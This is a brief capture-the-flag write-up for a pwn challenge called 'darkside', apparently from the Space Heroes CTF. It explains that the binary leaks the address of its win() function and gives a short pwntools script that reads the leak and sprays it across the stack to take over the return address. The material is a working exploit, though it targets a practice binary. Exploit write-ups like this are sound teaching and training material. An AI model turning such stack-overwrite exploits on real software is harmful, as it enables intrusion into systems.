Tags: pwn 

Rating: 5.0

The binary leaks the address of the win() function but does not give an offset to control RIP. So you can just spray the address of win() across the stack.

```python

from pwn import *

p = process('./darkside')

data = p.recvline()
leak = p64(int(data.split(b' ')[-1], 16))
p.sendline(leak*100)
p.interactive()
```

Original writeup (https://github.com/tj-oconnor/spaceheroes_ctf/blob/main/pwn/pwn-darkside/solve/pwn-solve.py).